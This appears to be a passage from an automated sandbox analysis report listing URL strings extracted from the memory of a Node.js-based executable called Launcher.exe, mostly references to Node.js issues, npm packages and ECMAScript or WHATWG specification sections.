        Source: Launcher.exe, 00000000.00000003.1370791140.000003E4F2D41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1321060699.000001752667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mcollina)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mrjjwright)
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mysticatea/abort-controller
        Source: Launcher.exe, 00000000.00000003.1227628748.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mzabriskie)
        Source: Launcher.exe, 00000000.00000003.1227628748.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nickuraltsev)
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
        Source: Launcher.exe, 00000000.00000003.1209423627.0000017525D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/1a96d83a223ff9f05f7d942fb84440d323f7b596/lib/internal/bootstrap/
        Source: Launcher.exe, 00000000.00000003.1306605324.0000017526303000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1323720251.0000017526303000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1300104935.0000017526303000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1306605324.0000017526307000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1386921235.0000036327841000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1365774806.0000020D192C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/b3fcc245fb25539909ef1d5eaa01dbf92e168633/lib/path.js#L56
        Source: Launcher.exe, 00000000.00000003.1259708993.00000175264AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1271970158.0000017526383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/v10.8.0/lib/internal/errors.js
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/10673
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/13435
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/19009
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2006
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2119
        Source: Launcher.exe, 00000000.00000003.1257176949.000001752622F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1257176949.000001752621F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1250342958.0000017525B31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/22066
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/3392
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/34532
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35452
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35475
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35862
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35981
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39707
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39758
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12342
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12607
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/21313
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/26334.
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30958
        Source: Launcher.exe, 00000000.00000003.1209423627.0000017525D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33229
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33515.
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33661
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/3394
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34010
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34375
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34385
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/36061#discussion_r533718029
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38248
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38433#issuecomment-828426932
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38614)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/cli)
        Source: Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/inflight.git
        Source: Launcher.exe, 00000000.00000003.1321060699.00000175266A6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1371928022.0000014E56B81000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/node-tar/blob/51b6627a1f357d2eb433e7378e5f05e83b7aa6cd/lib/header.js#L349
        Source: Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1283123422.000001752624B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/wrappy
        Source: Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1283123422.000001752624B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/wrappy/issues
        Source: Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/wrappy/issuesst
        Source: Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/wrappyMin
        Source: Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/wrappyortA
        Source: Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/orlandov)
        Source: Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/phated)
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/node-gyp-build
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/node-gyp-build.git
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/node-gyp-build.gitA
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/node-gyp-build/issues
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/prebuild-install)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1347810479.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/prebuild/issues/174)
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/primno/dpapi#readme
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/primno/dpapi#readmea
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/primno/dpapi.git
        Source: Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://travis-ci.org/lodash/lodash-cli
        Source: Launcher.exe, 00000000.00000003.1275681448.00000175261D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261532478.00000175261D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/BlaineBublitz)
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#forbidden-host-code-point
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#special-scheme
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url-serializing
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://v8.dev/blog/v8-release-89
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-mark-resource-timing
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-setup-the-resource-timing-entry
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://webassembly.github.io/spec/web-api
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
        Source: Launcher.exe, 00000000.00000003.1284664317.0000017526287000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1284664317.000001752628B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1365774806.0000020D192C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.archiverjs.com/zip-stream/ZipStream.html
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-timeclip
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Alternative
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Atom
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClass
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetter
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalDigits
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Disjunction
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digits
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigit
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigits
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexEscapeSequence
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRanges
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-OctalDigit
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Pattern
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-PatternCharacter
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Quantifier
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-QuantifierPrefix
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-RegExpUnicodeEscapeSequence
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-SyntaxCharacter
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-AtomEscape
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-CharacterEscape
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetter
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassEscape
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtom
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedPatternCharacter
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-IdentityEscape
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-InvalidBracedQuantifier
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-LegacyOctalEscapeSequence
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Term
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-term
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
        Source: Launcher.exe, 00000000.00000003.1515621239.00000175261E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2011/february/double-hmac-verificati
